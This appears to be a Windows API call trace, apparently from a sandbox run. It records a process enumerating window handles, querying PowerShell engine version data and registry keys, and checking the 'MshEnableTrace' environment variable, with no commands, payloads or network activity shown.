	[0513.638] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xb0
	[0513.638] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x250
	[0513.638] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x240
	[0513.638] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x790
	[0513.638] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x61c
	[0513.638] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x540
	[0513.638] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x538
	[0513.639] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x568
	[0513.639] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x538
	[0513.639] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x568
	[0513.639] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x538
	[0513.639] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x540
	[0513.639] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x540
	[0513.639] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x57c
	[0513.639] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x460
	[0513.639] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x554
	[0513.640] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x4d0
	[0513.640] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x528
	[0513.640] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x4d0
	[0513.640] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x4d0
	[0513.640] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x4d0
	[0513.640] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x79c
	[0513.640] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x4d0
	[0513.640] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x4e0
	[0513.641] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x4d0
	[0513.641] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x460
	[0513.641] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x460
	[0513.641] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x44c
	[0513.641] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x778
	[0513.641] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x460
	[0513.641] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x558
	[0513.641] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x4d0
	[0513.642] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x4d0
	[0513.642] GetWindowThreadProcessId (in: hWnd=0x1079c, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x18d0
	[0513.642] GetWindowThreadProcessId (in: hWnd=0x10792, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1840
	[0513.642] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x10c4
	[0513.642] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x128c
	[0513.642] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x16e8
	[0513.642] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x16cc
	[0513.642] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x274
	[0513.643] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x10e0
	[0513.643] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x10cc
	[0513.643] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x10c0
	[0513.643] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x10d0
	[0513.643] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1198
	[0513.643] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1080
	[0513.643] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1074
	[0513.643] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x106c
	[0513.644] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1474
	[0513.644] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1414
	[0513.644] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xbd0
	[0513.644] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x550
	[0513.644] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xa38
	[0513.644] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x16d0
	[0513.644] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x16d4
	[0513.644] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x15bc
	[0513.645] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x15a0
	[0513.645] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x159c
	[0513.645] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1598
	[0513.645] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1594
	[0513.645] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1590
	[0513.645] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x158c
	[0513.645] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1588
	[0513.645] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1584
	[0513.646] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1580
	[0513.646] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x157c
	[0513.646] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1488
	[0513.646] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1404
	[0513.646] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x11b8
	[0513.646] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xbd4
	[0513.646] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xe0c
	[0513.646] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xd30
	[0513.647] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xe70
	[0513.647] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x13b8
	[0513.647] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xe20
	[0513.647] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xe2c
	[0513.647] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xe00
	[0513.647] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xe04
	[0514.996] WerSetFlags () returned 0x0
	[0515.003] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0515.004] CoTaskMemFree (pv=0x0) 
	[0515.005] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xcde28, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcde20 | out: pulNumLanguages=0xcde28, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcde20) returned 1
	[0515.005] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xcde28, pwszLanguagesBuffer=0x2e37be8, pcchLanguagesBuffer=0xcde20 | out: pulNumLanguages=0xcde28, pwszLanguagesBuffer=0x2e37be8, pcchLanguagesBuffer=0xcde20) returned 1
	[0515.010] CoTaskMemAlloc (cb=0x24) returned 0x334da0
	[0515.010] GetUserDefaultLocaleName (in: lpLocaleName=0x334da0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0515.011] CoTaskMemFree (pv=0x334da0) 
	[0515.033] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0515.033] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0515.034] CoTaskMemFree (pv=0x2913d0) 
	[0515.036] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0515.036] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0515.036] CoTaskMemFree (pv=0x2913d0) 
	[0516.914] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0516.914] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0516.914] CoTaskMemFree (pv=0x2913d0) 
	[0516.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0516.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0516.925] SetErrorMode (uMode=0x1) returned 0x1
	[0516.925] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcdaa0 | out: lpFileInformation=0xcdaa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0516.925] SetErrorMode (uMode=0x1) returned 0x1
	[0516.925] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xcdd10 | out: lpdwHandle=0xcdd10) returned 0x94c
	[0516.926] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2e3b478 | out: lpData=0x2e3b478) returned 1
	[0516.927] VerQueryValueW (in: pBlock=0x2e3b478, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdc88, puLen=0xcdc80 | out: lplpBuffer=0xcdc88*=0x2e3b514, puLen=0xcdc80) returned 1
	[0516.927] VerQueryValueW (in: pBlock=0x2e3b478, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcdbf8, puLen=0xcdbf0 | out: lplpBuffer=0xcdbf8*=0x2e3b5f0, puLen=0xcdbf0) returned 1
	[0516.927] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0516.927] CoTaskMemAlloc (cb=0x2e) returned 0x33c0e0
	[0516.927] lstrcpyW (in: lpString1=0x33c0e0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0516.927] CoTaskMemFree (pv=0x33c0e0) 
	[0516.927] VerQueryValueW (in: pBlock=0x2e3b478, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcdbf8, puLen=0xcdbf0 | out: lplpBuffer=0xcdbf8*=0x2e3b644, puLen=0xcdbf0) returned 1
	[0516.927] lstrlenW (lpString="System.Management.Automation") returned 28
	[0516.927] CoTaskMemAlloc (cb=0x3c) returned 0x33a890
	[0516.927] lstrcpyW (in: lpString1=0x33a890, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0516.928] CoTaskMemFree (pv=0x33a890) 
	[0516.928] VerQueryValueW (in: pBlock=0x2e3b478, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcdbf8, puLen=0xcdbf0 | out: lplpBuffer=0xcdbf8*=0x2e3b6a0, puLen=0xcdbf0) returned 1
	[0516.928] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0516.928] CoTaskMemAlloc (cb=0x20) returned 0x334d10
	[0516.928] lstrcpyW (in: lpString1=0x334d10, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0516.928] CoTaskMemFree (pv=0x334d10) 
	[0516.928] VerQueryValueW (in: pBlock=0x2e3b478, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcdbf8, puLen=0xcdbf0 | out: lplpBuffer=0xcdbf8*=0x2e3b6e0, puLen=0xcdbf0) returned 1
	[0516.928] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0516.928] CoTaskMemAlloc (cb=0x44) returned 0x33a890
	[0516.928] lstrcpyW (in: lpString1=0x33a890, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0516.928] CoTaskMemFree (pv=0x33a890) 
	[0516.928] VerQueryValueW (in: pBlock=0x2e3b478, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcdbf8, puLen=0xcdbf0 | out: lplpBuffer=0xcdbf8*=0x2e3b748, puLen=0xcdbf0) returned 1
	[0516.928] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0516.928] CoTaskMemAlloc (cb=0x76) returned 0x2cf240
	[0516.928] lstrcpyW (in: lpString1=0x2cf240, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0516.928] CoTaskMemFree (pv=0x2cf240) 
	[0516.928] VerQueryValueW (in: pBlock=0x2e3b478, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcdbf8, puLen=0xcdbf0 | out: lplpBuffer=0xcdbf8*=0x2e3b7e4, puLen=0xcdbf0) returned 1
	[0516.928] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0516.928] CoTaskMemAlloc (cb=0x44) returned 0x33a890
	[0516.928] lstrcpyW (in: lpString1=0x33a890, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0516.928] CoTaskMemFree (pv=0x33a890) 
	[0516.928] VerQueryValueW (in: pBlock=0x2e3b478, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcdbf8, puLen=0xcdbf0 | out: lplpBuffer=0xcdbf8*=0x2e3b848, puLen=0xcdbf0) returned 1
	[0516.928] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0516.928] CoTaskMemAlloc (cb=0x58) returned 0x2b7780
	[0516.928] lstrcpyW (in: lpString1=0x2b7780, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0516.928] CoTaskMemFree (pv=0x2b7780) 
	[0516.928] VerQueryValueW (in: pBlock=0x2e3b478, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcdbf8, puLen=0xcdbf0 | out: lplpBuffer=0xcdbf8*=0x2e3b8c4, puLen=0xcdbf0) returned 1
	[0516.928] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0516.928] CoTaskMemAlloc (cb=0x20) returned 0x334d10
	[0516.928] lstrcpyW (in: lpString1=0x334d10, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0516.929] CoTaskMemFree (pv=0x334d10) 
	[0516.929] VerQueryValueW (in: pBlock=0x2e3b478, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcdbf8, puLen=0xcdbf0 | out: lplpBuffer=0xcdbf8*=0x2e3b56c, puLen=0xcdbf0) returned 1
	[0516.929] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0516.929] CoTaskMemAlloc (cb=0x66) returned 0x2f0110
	[0516.929] lstrcpyW (in: lpString1=0x2f0110, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0516.929] CoTaskMemFree (pv=0x2f0110) 
	[0516.929] VerQueryValueW (in: pBlock=0x2e3b478, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcdbf8, puLen=0xcdbf0 | out: lplpBuffer=0xcdbf8*=0x0, puLen=0xcdbf0) returned 0
	[0516.929] VerQueryValueW (in: pBlock=0x2e3b478, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcdbf8, puLen=0xcdbf0 | out: lplpBuffer=0xcdbf8*=0x0, puLen=0xcdbf0) returned 0
	[0516.929] VerQueryValueW (in: pBlock=0x2e3b478, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcdbf8, puLen=0xcdbf0 | out: lplpBuffer=0xcdbf8*=0x0, puLen=0xcdbf0) returned 0
	[0516.929] VerQueryValueW (in: pBlock=0x2e3b478, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdbc8, puLen=0xcdbc0 | out: lplpBuffer=0xcdbc8*=0x2e3b514, puLen=0xcdbc0) returned 1
	[0516.929] CoTaskMemAlloc (cb=0x204) returned 0x3368e0
	[0516.929] VerLanguageNameW (in: wLang=0x0, szLang=0x3368e0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0516.929] CoTaskMemFree (pv=0x3368e0) 
	[0516.929] VerQueryValueW (in: pBlock=0x2e3b478, lpSubBlock="\\", lplpBuffer=0xcdc18, puLen=0xcdc10 | out: lplpBuffer=0xcdc18*=0x2e3b4a0, puLen=0xcdc10) returned 1
	[0516.937] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0516.937] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0516.937] CoTaskMemFree (pv=0x2913d0) 
	[0516.939] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0516.939] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0516.939] CoTaskMemFree (pv=0x2913d0) 
	[0516.945] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcdae8 | out: phkResult=0xcdae8*=0x308) returned 0x0
	[0516.947] RegOpenKeyExW (in: hKey=0x308, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xcdad8 | out: phkResult=0xcdad8*=0x30c) returned 0x0
	[0516.947] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcdb68 | out: phkResult=0xcdb68*=0x310) returned 0x0
	[0516.949] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcdaac, lpData=0x0, lpcbData=0xcdaa8*=0x0 | out: lpType=0xcdaac*=0x1, lpData=0x0, lpcbData=0xcdaa8*=0x56) returned 0x0
	[0516.950] CoTaskMemAlloc (cb=0x5a) returned 0x2f00a0
	[0516.950] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcda7c, lpData=0x2f00a0, lpcbData=0xcda78*=0x56 | out: lpType=0xcda7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcda78*=0x56) returned 0x0
	[0516.951] CoTaskMemFree (pv=0x2f00a0) 
	[0518.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0518.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0518.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0518.526] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0518.526] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0518.526] CoTaskMemFree (pv=0x2913d0) 
	[0522.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0522.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0524.530] CoTaskMemAlloc (cb=0x104) returned 0x2914e0
	[0524.530] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2914e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0524.530] CoTaskMemFree (pv=0x2914e0) 
	[0524.530] CoTaskMemAlloc (cb=0x104) returned 0x2914e0
	[0524.530] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2914e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0524.530] CoTaskMemFree (pv=0x2914e0) 
	[0525.495] CoTaskMemAlloc (cb=0x104) returned 0x2914e0
	[0525.495] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2914e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0525.495] CoTaskMemFree (pv=0x2914e0) 
	[0525.496] CoTaskMemAlloc (cb=0x104) returned 0x2914e0
	[0525.497] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2914e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0525.497] CoTaskMemFree (pv=0x2914e0) 
	[0525.497] CoTaskMemAlloc (cb=0x104) returned 0x2914e0
	[0525.497] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2914e0, nSize=0x80 | out: lpBuffer="") returned 0x0
